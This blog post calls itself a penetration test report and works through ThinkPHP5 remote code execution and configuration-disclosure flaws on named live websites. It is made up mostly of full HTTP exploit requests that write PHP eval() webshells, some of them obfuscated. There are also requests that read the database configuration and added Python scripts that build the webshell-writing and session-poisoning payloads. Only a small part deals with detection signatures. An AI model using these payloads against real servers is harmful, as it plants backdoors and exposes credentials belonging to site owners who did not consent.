
ThinkPHP5 Code Injection Vulnerability Summary: Penetration Test Report

易航
Published January 27

tp5_construct_code_exec_2 vulnerability

url:http://blog.bri6.cn/index.php?s=captcha

Vulnerability verification

Request:

POST /index.php?s=captcha HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 60
Connection: close

_method=__construct&method=GET&filter[]=var_dump&get[]=dylan

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 02 Mar 2023 05:21:43 GMT
Content-Type: image/png; charset=utf-8
Content-Length: 1876
Connection: close
Set-Cookie: PHPSESSID=v8cee56q175b9p0907sv4lchl4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

string(5) "dylan"
string(11) "__construct"
string(3) "GET"
string(8) "var_dump"
string(5) "dylan"
NULL
‰PNG


Vulnerable: the injected filter (var_dump) was applied to the injected GET value, which shows that _method=__construct overwrote the Request object's method, filter and get properties.

payload1 (system() + single-quoted echo)

POST /index.php?s=captcha HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 125
Connection: close

_method=__construct&method=GET&filter[]=system&get[]=echo+'%3C%3Fphp+%40eval%28%24_POST%5B%22kkk%22%5D%29%3B%3F%3E'+>bak1.php

payload2 (system() + double-quoted echo). Caveat: inside double quotes /bin/sh expands $_POST as a shell variable, so this variant writes a broken file unless the dollar sign is escaped; prefer payload1 or payload3.

POST /index.php?s=captcha HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 125
Connection: close

_method=__construct&method=GET&filter[]=system&get[]=echo+"%3C%3Fphp+%40eval%28%24_POST%5B%27kkk%27%5D%29%3B%3F%3E"+>bak1.php

payload3 (assert() + base64-encoded file_put_contents; the PHP never passes through a shell). Note that assert() no longer evaluates string arguments on PHP 8.

POST /index.php?s=captcha HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 142
Connection: close

_method=__construct&method=GET&filter[]=assert&get[]=file_put_contents('bak1.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydra2snXSk7Pz4%3D'))

Write succeeded

tp5_index_construct_rce vulnerability

url:http://blog.bri6.cn/index.php?s=index/index/index

Vulnerability verification

Request:

POST /index.php?s=index/index/index HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 52
Connection: close

s=xskfC&_method=__construct&method&filter[]=var_dump

Response:

HTTP/1.1 500 Internal Server Error
Server: nginx
Date: Thu, 02 Mar 2023 05:41:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: PHPSESSID=08bvf36sj6d6n1n8d0jrvqp184; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 282

string(5) "xskfC"
string(11) "__construct"
string(0) ""
string(8) "var_dump"
string(5) "xskfC"
string(11) "__construct"
string(0) ""
string(8) "var_dump"
string(5) "xskfC"
string(11) "__construct"
string(0) ""
string(8) "var_dump"
Invalid link! Please contact customer service for a valid link!

Vulnerable: the var_dump filter ran over every POST value (s, _method, method, filter) before the application's own handler produced its 500 page.

payload

POST /index.php?s=index/index/index HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 186
Connection: close

s=file_put_contents('bak5.php',base64_decode('PD9waHAgJGE9In4rZCgpIl4iIXsre30iO0AkYj1iYXNlNjRfZGVjb2RlKCR7JGF9WyJhIl0pO2V2YWwoIiIuJGIpOz8%2B'))&_method=__construct&method&filter[]=assert

Write succeeded
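The two sections above (the ?s=captcha and the index/index/index variants) use the same trick: _method=__construct lets the POST body overwrite the Request object's properties, and the attacker-chosen filter is then applied to attacker-chosen values. The script below is an added example, not code from the report or from ThinkPHP: it builds the var_dump probe for both variants, decides from the response whether the probe hit, and builds the assert()+base64 write payload so no shell quoting is involved. The canary "dylan", the send helper and the hostnames are assumptions; the parameter names are the ones the requests above rely on.

```python
import base64
import http.client
import re
from urllib.parse import urlencode

# Constructed canary; the parameter names (_method, method, filter[], get[], s)
# are the ones the two requests above rely on.
CANARY = "dylan"


def build_probe_body(canary=CANARY, via_get=True):
    """Body of the _method=__construct probe. A harmless filter (var_dump) is
    registered on the Request object; if the canary comes back var_dump-ed,
    the overwritten properties were honoured."""
    if via_get:   # ?s=captcha: the filter runs over the injected GET values
        fields = [("_method", "__construct"), ("method", "GET"),
                  ("filter[]", "var_dump"), ("get[]", canary)]
    else:         # index/index/index: the filter runs over the POST values
        fields = [("s", canary), ("_method", "__construct"), ("method", ""),
                  ("filter[]", "var_dump")]
    return urlencode(fields)


_VARDUMP = re.compile(r'string\((\d+)\) "([^"]*)"')


def probe_hit(response_body, canary=CANARY):
    """True when the response contains var_dump's rendering of the canary
    with the right byte length, i.e. the filter was applied to our value."""
    return any(int(n) == len(v.encode()) and v == canary
               for n, v in _VARDUMP.findall(response_body))


def build_write_body(filename, password):
    """Write a one-line eval() shell via assert()+file_put_contents, as in
    payload3 above. The PHP travels base64-encoded, so no shell quoting is
    involved (payload2's double-quoted echo lets /bin/sh expand $_POST).
    Caveat: assert() no longer evaluates string arguments on PHP 8."""
    php = f"<?php @eval($_POST['{password}']);?>"
    b64 = base64.b64encode(php.encode()).decode()
    expr = f"file_put_contents('{filename}',base64_decode('{b64}'))"
    return urlencode([("_method", "__construct"), ("method", "GET"),
                      ("filter[]", "assert"), ("get[]", expr)])


def send_body(host, path, body, https=False):
    """Send one form POST and return (status, body). Network helper only;
    the offline checks below never call it."""
    cls = http.client.HTTPSConnection if https else http.client.HTTPConnection
    conn = cls(host, timeout=10)
    conn.request("POST", path, body=body,
                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    resp = conn.getresponse()
    return resp.status, resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    # Offline check against the response captured in the report above.
    captured = 'string(5) "dylan"\nstring(11) "__construct"\nstring(3) "GET"\n'
    print(build_probe_body())
    print("vulnerable" if probe_hit(captured) else "no hit")
    print(build_write_body("bak1.php", "kkk"))
```

The length check in probe_hit matters: a page that merely echoes the parameter name back (a WAF block page, a debug dump of the raw query string) does not produce the `string(N) "..."` rendering with a matching N, so it is not mistaken for a hit.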

tp5_session_include vulnerability

url:http://blog.bri6.cn/index.php/index

Vulnerability verification

Request:

POST /index.php/index HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Cookie: PHPSESSID=uzozteeqzqb0lxop0bi3awl9g
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 113
Connection: close

_method=__construct&method=GET&filter[]=think\__include_file&get[]=/tmp/sess_uzozteeqzqb0lxop0bi3awl9g&server[]=1

Response (contents of the included session file):

think|a:5:{s:4:"test";s:0:"";s:11:"__construct";s:0:"";s:18:"think\Session::set";s:0:"";s:3:"get";s:0:"";i:1;s:0:"";}

payload (stores the PHP source as a session key via think\Session::set; it executes when the session file for this PHPSESSID is included again with the verification request above)

POST /index.php?s=captcha HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Cookie: PHPSESSID=q1ces7rkvhr3gg7t9daaxkh9w
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 260
Connection: close

_method=__construct&filter[]=think\Session::set&method=get&get[]=<?php+$a='file_put_contents';$b='base64_decode';$a($b('YmFrLnBocA=='),$b('PD9waHAgQGV2YWwoJF9QT1NUWydra2snXSk7Pz4='));?>&server[]=1

Write succeeded
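The session chain has two steps that must share one PHPSESSID: think\Session::set stores the PHP source as a key in the session file, and think\__include_file includes that file. The script below is an added example (not the report's or ThinkPHP's code) that derives the session file path from the cookie, builds both request bodies, and parses the serialized dump that the include step returns to confirm the poisoned key is present. The files-handler save path /tmp is an assumption (read session.save_path from phpinfo() when it is available); the parser covers only the serialize() types that appear in the dump above.

```python
import re
from urllib.parse import urlencode

SESSION_SAVE_PATH = "/tmp"   # assumption: php.ini default for the files handler


def session_file_path(phpsessid, save_path=SESSION_SAVE_PATH):
    """Path PHP's files handler uses for a session id. Anything that is not a
    valid id is rejected so a cookie value cannot smuggle path components."""
    if not re.fullmatch(r"[A-Za-z0-9,-]{22,256}", phpsessid):
        raise ValueError("not a PHPSESSID")
    return f"{save_path}/sess_{phpsessid}"


def poison_body(php_code):
    """Step 1: the filter think\\Session::set receives each injected value as
    its $name argument, so the PHP source becomes a key in the session file."""
    return urlencode([("_method", "__construct"), ("filter[]", "think\\Session::set"),
                      ("method", "get"), ("get[]", php_code), ("server[]", "1")])


def include_body(phpsessid):
    """Step 2 (same PHPSESSID cookie): think\\__include_file includes the
    session file, which executes the stored PHP."""
    return urlencode([("_method", "__construct"), ("method", "GET"),
                      ("filter[]", "think\\__include_file"),
                      ("get[]", session_file_path(phpsessid)), ("server[]", "1")])


def _unserialize(data, pos):
    """Minimal PHP unserialize() for the types session data holds here:
    N (null), i (int), b (bool), s (byte-counted string), a (array)."""
    t = chr(data[pos])
    if t == "N":                                   # N;
        return None, pos + 2
    if t in "ib":                                  # i:123;
        end = data.index(b";", pos)
        return int(data[pos + 2:end]), end + 1
    if t == "s":                                   # s:len:"bytes";
        colon = data.index(b":", pos + 2)
        n = int(data[pos + 2:colon])
        start = colon + 2                          # skip ':"'
        value = data[start:start + n].decode("utf-8", "replace")
        return value, start + n + 2                # skip '";'
    if t == "a":                                   # a:count:{key;value;...}
        colon = data.index(b":", pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2                            # skip ':{'
        out = {}
        for _ in range(count):
            key, pos = _unserialize(data, pos)
            val, pos = _unserialize(data, pos)
            out[key] = val
        return out, pos + 1                        # skip '}'
    raise ValueError(f"unsupported type {t!r} at offset {pos}")


def session_keys(dump):
    """(namespace, keys) of a dump like think|a:5:{...}. Byte lengths, not
    delimiters, drive the parse, so keys holding quotes or semicolons (our
    PHP source) are read back intact."""
    data = dump if isinstance(dump, bytes) else dump.encode()
    namespace, _, rest = data.partition(b"|")
    arr, _ = _unserialize(rest, 0)
    return namespace.decode(), list(arr)


def poisoned(dump, php_code):
    """True once the PHP source from poison_body() is a key in the session."""
    return php_code in session_keys(dump)[1]


if __name__ == "__main__":
    sid = "uzozteeqzqb0lxop0bi3awl9g"              # cookie from the report above
    print(poison_body("<?php @eval($_POST['kkk']);?>"))
    print(include_body(sid))
```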

tp5_invoke_func_code_exec_1 vulnerability

url:http://blog.bri6.cn/index.php?s=index/think\app/invokefunction&function=phpinfo&vars[0]=-1

Vulnerability verification

Request:

GET /index.php?s=index/think\app/invokefunction&function=phpinfo&vars[0]=-1 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

Response:

phpinfo page

Vulnerable

payload

GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=bak6.php&vars[1][]=%3C%3Fphp+%24a%3D%22%7E%2Bd%28%29%22%5E%22%21%7B%2B%7B%7D%22%3B%40%24b%3Dbase64_decode%28%24%7B%24a%7D%5B%22a%22%5D%29%3Beval%28%22%22.%24b%29%3B%3F%3E HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

tp5_dbinfo_leak vulnerability (database configuration disclosure)

url:http://blog.bri6.cn/index.php?s=index/think\config/get&name=database.hostname

Vulnerability verification

Request:

GET /?s=index/think\config/get&name=database.hostname HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 02 Mar 2023 05:51:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 9

localhost

Vulnerable: think\Config::get is reachable through the route, so any configuration key can be read

payload1

GET /?s=index/think\config/get&name=database.hostname HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

payload2

GET /?s=index/think\config/get&name=database.hostport HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

payload3

GET /?s=index/think\config/get&name=database.database HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

payload4

GET /?s=index/think\config/get&name=database.username HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
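The last two sections both exploit route injection through the s parameter (think\app::invokefunction for code execution, think\Config::get for configuration disclosure), and both are visible in the request line rather than in a POST body. The script below is an added example, not the report's or ThinkPHP's code: it builds the invokefunction and config-get URLs with correct nesting and percent-encoding (the vars[1][] array form used for call_user_func_array above), enumerates the database.* keys the report reads, and, for the detection side, classifies a request target and body against the three ThinkPHP5 signatures used on this page after peeling stacked percent-encoding. database.password is added to the key list as a standard ThinkPHP5 key; it is not read in the report above.

```python
import re
from urllib.parse import urlencode, unquote_plus

ROUTE_INVOKE = "index/think\\app/invokefunction"   # 5.0.x form used above
ROUTE_CONFIG = "index/think\\config/get"
DB_KEYS = ["database.hostname", "database.hostport", "database.database",
           "database.username",
           "database.password"]   # standard TP5 key, not read in the report


def invokefunction_url(function, args, base="/index.php"):
    """GET URL calling <function> via think\\app::invokefunction. Scalars go
    in vars[i]; a list/tuple becomes vars[i][]=... so PHP receives an array,
    which is what call_user_func_array needs for its argument list."""
    fields = [("s", ROUTE_INVOKE), ("function", function)]
    for i, arg in enumerate(args):
        if isinstance(arg, (list, tuple)):
            fields += [(f"vars[{i}][]", v) for v in arg]
        else:
            fields.append((f"vars[{i}]", arg))
    return f"{base}?{urlencode(fields)}"


def config_get_url(key, base="/index.php"):
    """GET URL reading one configuration key via think\\Config::get."""
    return f"{base}?{urlencode([('s', ROUTE_CONFIG), ('name', key)])}"


def db_leak_urls(base="/index.php"):
    """One request per database.* key, in the order the report reads them."""
    return [config_get_url(k, base) for k in DB_KEYS]


# Detection: the three request shapes this page relies on.
SIGNATURES = [
    ("invokefunction",  re.compile(r"think\\app[\\/]invokefunction", re.I)),
    ("config_get",      re.compile(r"think\\config[\\/]get", re.I)),
    ("method_override", re.compile(r"(?:^|[&?\s])_method=__construct(?!\w)", re.I | re.M)),
]


def _fully_decoded(s, rounds=3):
    """Peel percent-encoding until stable (bounded, so %2525... cannot loop)."""
    for _ in range(rounds):
        nxt = unquote_plus(s)
        if nxt == s:
            break
        s = nxt
    return s


def classify_request(target, body=""):
    """Names of the signatures found in a request target (path+query) and an
    optional form body; an empty list means nothing on this page matched."""
    text = _fully_decoded(target) + "\n" + _fully_decoded(body)
    return [name for name, rx in SIGNATURES if rx.search(text)]


if __name__ == "__main__":
    print(invokefunction_url("phpinfo", ["-1"]))
    for url in db_leak_urls():
        print(url)
    print(classify_request("/index.php?s=captcha",
                           "_method=__construct&method=GET&filter[]=system&get[]=id"))
```

The method_override signature only fires on a body (or a query string) carrying _method=__construct, so a plain visit to ?s=captcha is not flagged; deploy it where request bodies are available (a reverse proxy or WAF log), since a standard access log records only the request line.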